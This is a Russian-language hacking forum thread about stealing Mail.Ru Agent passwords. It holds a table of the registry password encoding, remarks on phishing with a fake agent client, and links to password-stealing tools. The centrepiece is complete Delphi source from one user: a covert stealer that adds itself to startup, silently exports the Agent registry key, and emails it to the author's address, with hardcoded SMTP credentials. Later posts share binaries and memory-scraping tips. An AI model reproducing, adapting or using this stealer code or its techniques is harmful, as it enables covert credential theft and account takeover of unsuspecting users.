Покопался тут в реестре ,нашёл где хранятся пароли.

Создаю нового пользователя abc@mail.ru,пароль устанавливаю 12345
в реестре смотрю HKEY_CURRENT_USER / Software / Mail.Ru / Agent /mra_logins.
Смотрю двоичный параметр abc@mail.ru , значение 05 00 00 00 9b 98 99 9e 9f.
05-это длина пароля,потом 00 00 00 (вводил различные пароли всёравно было 00 00 00),
дальше идёт сам пароль(не в открытом виде конечно) 9b 98 99 9e 9f.
Так вот мне интересно у всех ли пароли кодируются подобным образом,приведу некоторые
значения :
цифры: буквы:

0 -9a A -eb
1 -9b B -e8
2 -98 C -e9
3 -99 D -ee
4 -9e E -ef
5 -9f F -ec
6 -9c
7 -9d
8 -92
9 -93

Если кодировка одинаковая то можно сделать программу ,которая будет читать
пароли к мылу из реестра и показывать её уже в нормальном виде.

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

Вексь описаный там способ давно известен, я вообще не знаю к чему эта статья, по-моему полный бред, чтобы придумать такое достаточно просто здраво размышлять и хотя бы немного напрячь мозги. Плюс к тому, что способ будет работать только на локальной машине, так тебе ещё и фаер скажет о том, что процесс пытается прочесть память другого. Таких слесарских способов можно придумать кучу, вместо того, чтобы один раз исследовать алгоритм шифрования.

| Сообщение посчитали полезным:

AmLupus пишит:

вместо того, чтобы один раз исследовать алгоритм шифрования.

Ну раз ты исследовал алгоритм шифрования, то поделись инфой.

Amok пишит:

В М-Агенте переписка логируеться в текстовые файлы на винте в таком виде:

eNpVUEFqxDAMTEtPC/sHPWAPTpqFQl6x0KMuiqM4Zr12sJ20Tti3p04KhV4GoZnRSHo
tiuL2UhQr+tiXSDboA+SoyupaYcd9L3Y0ZFUp3q8r9s7G2JpcCOytNtjLgXzgKOCTBveg
5pm58j9XifqPfZ5PK0pnnM9joEHPnUDlma3A1kwsmqzAWfPXXduuxkmWOJLvUO5Tc2
goP8AyKDKcoI4OZr1M0JHRF1g6DgnCNLLfTecTB6OhTfDIjnlXMrh4p+VQZ29uj1OI+lfV
OpPCwDDou1MEC4HyZLVMFyBIBMG12lMKkPibYgKlM8zAs3fjtF99ZOb93/Jjt20rfgCDMX u2

Это одно сообщение типа "Привет".

| Сообщение посчитали полезным:

Amok пишет:
Спасибо за ссылку на статью, она заставляет задуматься.... ведь описанный там способ не требует даже расшифровки пароля к мылу
Amok сильно можешь не радоваться ,т.к. в следующих версии ,я думаю,эти ощибки будут устранены.


di-2 пишет:
Суть была впарить под любым предлогом нового агента,который написан по выше изложеной статье,т.е имеет форму ввода пароля и имени,аналогичную майл агенту(привет фишинг =) ) и при вводе отправляла их на мой е-майл.
Да штука интересная ,мне знакомый расказывал,что у него агент не хочет работать,я прогу эту посмотрел
оказалась что агент то фальшивый,ну я ему объяснил ,что это за штуку ему впарили. Кому интересно сыда
bit-team.com/modules.php?name=Files&d_op=get_file_details&files_id=23

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

Да это какая то . Не получается соединиться. IdSMTP1.Connect() не происходит

| Сообщение посчитали полезным:

DrShX пишет:
Не получается соединиться. IdSMTP1.Connect() не происходит
Учи Delphi и поймёшь ,что всё работает...

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

Если кому-то нужны исходники програмы которая тащит пароли из агента, и справка к расшифровке пароля - обращайтесь ко мне! (на Delphi).

| Сообщение посчитали полезным:

Гы-гы кто-то еще не умеет тут копи/пастить код?

| Сообщение посчитали полезным:

brok пишет:
Если кому-то нужны исходники програмы которая тащит пароли из агента

brok выкладывай посмотрим

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

brok
Буть добр, выложи

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

Если кому-то нужны исходники програмы которая тащит пароли из агента, и справка к расшифровке пароля - обращайтесь ко мне в ПМ! код на АСМЕ ......

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

Программа написана на Turbo Delphi.
Но она не расшифровывает пароль, она передает скрытно от пользователя файл из реестра.
Но потом имея этот файл, легко можно войти в агент.
***Проверено***

program bpp; {brok pass pizdelka}
//{$APPTYPE CONSOLE}
{$A+,B-,D-,F-,G+,I+,K-,L-,H-,N-,P-,Q-,R-,S-,T-,V-,W-,X+,Y-}
uses
SysUtils,
shellapi,
windows,
IdSMTP,
registry,
idMessage,
idattachmentfile,
Classes,
wininet;


const
rp='HKEY_CURRENT_USERSoftwareMail.RuAgent';
sp='c:windowsmf.reg';
sp2='c:windowsmf2.reg';

var
Smtp:TIdSMTP;
Msg:TIdMessage;
Atch:TIdAttachmentfile;
dwConnectionTypes: DWORD;
label 1;

procedure Autorun(RunName, AppName: string);
var
Reg: TRegistry;
begin
Reg := TRegistry.Create;
with Reg do
begin
RootKey := HKEY_LOCAL_MACHINE;
OpenKey('SoftwareMicrosoftWindowsCurrentVersionRun', True);
WriteString(RunName, AppName);
CloseKey;
Free;
end;
end;

procedure izvl;
begin
ShellExecute(1,'open','regedit','/e'+' '+sp+' '+rp,'',0);
end;

procedure send;
begin
Smtp:=TIdSMTP.Create;
Smtp.Host:='smtp.mail.ru';
Smtp.Password:='qwerty';
Smtp.Username:='password.q@mail.ru';
smtp.Port:=2525;
Msg:=TIdMessage.Create;
Msg.Subject:='bpp';
Msg.From.Text:='password.q@mail.ru';
Msg.Recipients.Add;;
msg.Recipients.Items[0].Text:='brok.qwer@mail.ru';
Atch:=TIdAttachmentfile.Create(msg.MessageParts,sp);
Atch.FileName:=(sp);
Smtp.Connect;
if smtp.Connected then
begin
Smtp.Send(Msg);
end;
Smtp.Disconnect;
end;

function CompareFiles(const FirstFile, SecondFile: string): Boolean;
var
f1, f2: TMemoryStream;
begin
if fileexists(sp2) then
begin
Result := false;
f1 := TMemoryStream.Create;
f2 := TMemoryStream.Create;
try
f1.LoadFromFile(FirstFile);
f2.LoadFromFile(SecondFile);
if f1.Size = f2.Size then
Result := CompareMem(f1.Memory, f2.memory, f1.Size);
finally
f2.Free;
f1.Free;
end
end;
end;


begin
Autorun('internet',paramstr(0));
izvl;
if CompareFiles(sp, sp2) then
begin
exit;
end;

1:
begin
dwConnectionTypes:=INTERNET_CONNECTION_MODEM;
if InternetGetConnectedState(@dwconnectiontypes,0)=true then
begin
send;
end
else
begin
goto 1;
end;
ShellExecute(1,'open','regedit','/e'+' '+sp2+' '+rp,'',0);
end;
end.

Ах да! Это консольное приложение! И ещё.
Если вы исправить код или добавите, что-нибудь выкладывайте плиз.

| Сообщение посчитали полезным:

ты бы хоть отметил где мыло править, а то щас "одепты" поотправляют свои пассы )
хотя "одептам" везет: форум слеши удаляет )
ЗЫ this is truly lame way

| Сообщение посчитали полезным:

а, ну да, мыло не валидное )

| Сообщение посчитали полезным:

Если кто может, выложите исходники программы расшифровки паролей.
Желательно на Delphi!
Зараннее благодарен.

| Сообщение посчитали полезным:

Написал тут на днях програмку - она какраз показывает пароли от MAgenta.
Может кому пригодится
P.S.Проверил на двух компах ,кажись работает нормально.

http://dump.ru/files/f/f518716126/ http://dump.ru/files/f/f518716126/

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

>Написал тут на днях програмку - она какраз показывает пароли от MAgenta.
копипаст исходников с предыдущей страницы? (не качал, по размеру - дельфа)

| Сообщение посчитали полезным:

WolfHunter пишет:
копипаст исходников с предыдущей страницы?

Да нет ,хотя общие моменты конечно же есть.
WolfHunter а ты как я помню свою прогу продавал - много продал
WolfHunter пишет:
текущая цена 300 wmr
--------------------------------------------------------

WolfHunter пишет:
не качал, по размеру - дельфа
Да дельфи,но я не думаю что 141 КБ долго качать.Да я и писал
MACKLIA пишет:
Может кому пригодится
- а кому нет качать и ненадо

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

MACKLIA +1! Прожка пашет

| Сообщение посчитали полезным:

MACKLIA
Перепиши на WinAPI, размер хоть уменьшиться!

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

MACKLIA пишет:
Amok сильно можешь не радоваться ,т.к. в следующих версии ,я думаю,эти ощибки будут устранены.

Сейчас специально скачал новую версию М-Агента, ошибки на месте ;)

Что так никто и не смотрел шифрование сообщений?

| Сообщение посчитали полезным:

показывает пароли от MAgenta мой вариант на АСМ (вытаскивание с реестра и из памяти при работающем агенте - из памяти в версии 4.7 из другой 4.8 на днях доделаюне успел) А пока вот прикрепленый вариант

<img src="img/attach.gif"> <SCRIPT type=text/javascript>dfl("files/","1e88_11.05.2007_CRACKLAB.rU.tgz");< /SCRIPT> - agent.rar

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

Прикрепляю еще раз ,поправил текст и ссылка чето развалилась , да win32 вариант

8c65_11.05.2007_CRACKLAB.rU.tgz - agent.rar

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

mak
Респект и уважуха. Наконец то нормальная версия.

-----
xchg dword [eax], eax

| Сообщение посчитали полезным:

mak пишет:
показывает пароли от MAgenta мой вариант на АСМ
Да, с моим по размеру не сравнить респект тебе.

mak пишет:
вытаскивание с реестра и из памяти при работающем агенте - из памяти в версии 4.7 из другой 4.8 на днях доделаюне успел
Ну про реестра понятно ,в памяти он вообще в версии 4,7 в откратом виде был,в 4,8 ещё не смотрел,а что там за различия такие координальные чтоли ?

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

MACKLIA пишет:
а что там за различия такие координальные чтоли

В 4.8 так же валяется в открытом виде, по адресу 00 64 74 34.

| Сообщение посчитали полезным:

mak пишет:
вытаскивание с реестра и из памяти при работающем агенте - из памяти в версии 4.7 из другой 4.8 на днях доделаюне успел
Ну про реестра понятно ,в памяти он вообще в версии 4,7 в откратом виде был,в 4,8 ещё не смотрел,а что там за различия такие координальные чтоли ?

Da tam adresa raznie Prosto ya ne uspel dodelat , tam chut chut. A s raskodirovkoz texta shas rabotau, posmotrim chego budet =)

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

показывает пароли от MAgenta мой вариант на АСМ (вытаскивание с реестра и из памяти при работающем агенте - из памяти в версиях 4.7 и 4.8) Последняя модификация


fbf4_11.05.2007_CRACKLAB.rU.tgz - agent.rar

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным:

mak пишет:
A s raskodirovkoz texta shas rabotau, posmotrim chego budet =)

ооо здорово, поделись тем что уже нарыл, хотябы в общих чертах.

| Сообщение посчитали полезным:

mak может ты ещё знаешь алгоритм и как dial-up пароли выдернуть ?

-----
Что один человек сделал , другой всегда сломать может...

| Сообщение посчитали полезным:

Amok пишет:
mak пишет:
A s raskodirovkoz texta shas rabotau, posmotrim chego budet =)

ооо здорово, поделись тем что уже нарыл, хотябы в общих чертах.

Там же есть просмотр истории ))))) бери его ставь бряк на нажатие клавиши и копируй код ,куда нить ....чтоб просто его разобрать ....в данном случае я ловил на сохранить все....ну а потом смотри что куда =) время надо но ...медлено изучаю,времени мало.

MACKLIA пишет:
mak может ты ещё знаешь алгоритм и как dial-up пароли выдернуть ?
Так бегло раньше смотрел в памяти в открытом виде не видел в реестре тоже ничего похожего может де на жестком во временном файле...но думаю по нажатию можно проследить ведь куда пишет, если стоит галка сохранить а так моно найти думаю

-----
RE In Progress [!] Coding Hazard [!] Stay Clear of this Cube

| Сообщение посчитали полезным: